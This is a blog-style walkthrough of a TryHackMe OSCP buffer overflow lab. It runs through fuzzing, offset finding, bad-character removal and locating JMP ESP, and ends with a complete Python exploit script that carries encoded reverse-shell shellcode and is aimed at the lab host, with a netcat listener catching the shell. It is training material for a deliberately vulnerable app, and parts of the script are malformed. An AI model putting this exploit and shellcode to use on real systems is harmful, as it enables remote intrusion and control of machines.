TryHackme! — OSCP Buffer Overflow
Going through the OSCP prep journey, it has now a days in trend, to solve out Buffer Overflow from TryHackMe! platform. Today I am going to share one of them, so that we may get an insight of basic steps by which easiest level stack buffer overflow can be exploited. Without wasting time, let’s get started.
STEP 1: Login into Tryhackme portal and go to dashboard for buffer overflow.
STEP 2: We will do Overflow 6
STEP3 : Deploy the VM
Now RDP into the machine using the same command as given above
Now go to Vulnerable app folder → Oscp and run the OSCP exe as administrator.
EXPLOITATION
STEP1: Spiking
First we will see what and how the input goes in. To do this, we will connect to IP 10.10.152.174 and Port 1337.
We see any input goes as OVERFLOW6 <variables>, so we will now fuzz
STEP 2: Fuzzing
To fuzz, run oscp.exe as administrator on target machine. Then on kali make fuzzing.py, a python script that sends in input in loop, increasing length each time, to see where is actually crashes
We see our program oscp.exe crashes at 1100 bytes nearly.
STEP 3: Finding Offset
Run oscp.exe and immunity debugger as administrator on target machine. Then attach oscp.exe process to immunity debugger and hit run
Create an offset pattern for 1100 bytes. For this we will use metasploit-framework tool, pattern_create
Create offset.py script
run the same script
on target machine’s immunity debugger
EIP : 35694234
We will use metasploit-framework’s pattern_offset.rb script again to get exact match of EIP and thus determining correct offset
STEP 4: Overwriting EIP
Run the Immunity debugger and oscp.exe again as administrator, attach the process to immunity and run it, as done previously
On kali, create overwrittenEIP.py. This will overwrite EIP with B’s and rest all with A’s.
Now run the script and notice on immunity debugger
STEP 5: Finding bad characters
Run the Immunity Debugger and oscp.exe as administrator and attach the process to debugger, then run it as done previously.
On kali, create badcharacters.py script, with all hex values for ascii ranging from x00 to xff are passed, to see if any creates issue.
Now run the script and observer on immunity debugger
Follow ESP in dump to see effect of badchars. For this right click on ESP and select Follow in DUMP,
Bad chars found : \x00\x08\x2c\xad . remember badchars may effect the one place before and after them. to be sure you remove these badchars from script, and do the whole above process again. If there is no character missing apart from the one’s which we have removed from our script, then there is no more bad char.
STEP 7: Finding right module
To find the right module we will use mona module in immunity debugger, which is pre installed in the target machine.
For this first run oscp.exe and immunity debugger as administrator again, also attach the process to debugger and run it.
Now we will use nasm_shell to get code for JMP ESP
Now on target machine, using mona modules find, which modules have JMP ESP in them , with least anti BOF vectors set to TRUE.
Now go to that address
Now press F2 to set a breakpoint on this address
STEP 8 : Hitting breakpoint
On target machine, set breakpoint on JMP ESP address. On kali make breakpoint.py script
run the script and observe on immunity
STEP 8: developing a shellcode
on target machine, run oscp.exe as admin. On kali, make shellcode.
#!/usr/bin/python
import sys,socket
from time import sleeppayload = ("\xba\xcb\xbe\xb2\x9c\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x9b\xb0\x50\x69\xe7\x25\x16"
"\x92\x17\xb6\x77\x1a\xf2\x87\xb7\x78\x77\xb7\x07\x0a\xd5\x34"
"\xe3\x5e\xcd\xcf\x81\x76\xe2\x78\x2f\xa1\xcd\x79\x1c\x91\x4c"
"\xfa\x5f\xc6\xae\xc3\xaf\x1b\xaf\x04\xcd\xd6\xfd\xdd\x99\x45"
"\x11\x69\xd7\x55\x9a\x21\xf9\xdd\x7f\xf1\xf8\xcc\x2e\x89\xa2"
"\xce\xd1\x5e\xdf\x46\xc9\x83\xda\x11\x62\x77\x90\xa3\xa2\x49"
"\x59\x0f\x8b\x65\xa8\x51\xcc\x42\x53\x24\x24\xb1\xee\x3f\xf3"
"\xcb\x34\xb5\xe7\x6c\xbe\x6d\xc3\x8d\x13\xeb\x80\x82\xd8\x7f"
"\xce\x86\xdf\xac\x65\xb2\x54\x53\xa9\x32\x2e\x70\x6d\x1e\xf4"
"\x19\x34\xfa\x5b\x25\x26\xa5\x04\x83\x2d\x48\x50\xbe\x6c\x05"
"\x95\xf3\x8e\xd5\xb1\x84\xfd\xe7\x1e\x3f\x69\x44\xd6\x99\x6e"
"\xab\xcd\x5e\xe0\x52\xee\x9e\x29\x91\xba\xce\x41\x30\xc3\x84"
"\x91\xbd\x16\x0a\xc1\x11\xc9\xeb\xb1\xd1\xb9\x83\xdb\xdd\xe6"
"\xb4\xe4\x37\x8f\x5f\x1f\xd0\xba\x9b\x13\x71\xd3\xa1\x2b\x71"
"\x73\x2f\xcd\x1b\x63\x79\x46\xb4\x1a\x20\x1c\x25\xe2\xfe\x59"
"\x65\x68\x0d\x9e\x28\x99\x78\x8c\xdd\x69\x37\xee\x48\x75\xed"
"\x86\x17\xe4\x6a\x56\x51\x15\x25\x01\x36\xeb\x3c\xc7\xaa\x52"
"\x97\xf5\x36\x02\xd0\xbd\xec\xf7\xdf\x3c\x60\x43\xc4\x2e\xbc"
"\x4c\x40\x1a\x10\x1b\x1e\xf4\xd6\xf5\xd0\xae\x80\xaa\xba\x26"
"\x54\x81\x7c\x30\x59\xcc\x0a\xdc\xe8\xb9\x4a\xe3\xc5\x2d\x5b"
"\x9c\x3b\xce\xa4\x77\xf8\xfe\xee\xd5\xa9\x96\xb6\x8c\xeb\xfa"
"\x48\x7b\x2f\x03\xcb\x89\xd0\xf0\xd3\xf8\xd5\xbd\x53\x11\xa4"
"\xae\x31\x15\x1b\xce\x13")shellcode = "A" * 1034 + "\xaf\x11\x50\x62" + "\x90"*16 + payload +"\r\n"try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.152.174',1337)))
s.send(("OVERFLOW6 "+ shellcode))
s.recv(1024)
s.close()
except:
print "Error Connecting to server"
sys.exit()
STEP 9: Getting the shell.
Now start netcat at port 80 on kali and run shellcode.py
We have successfully got reverse shell on our machine.
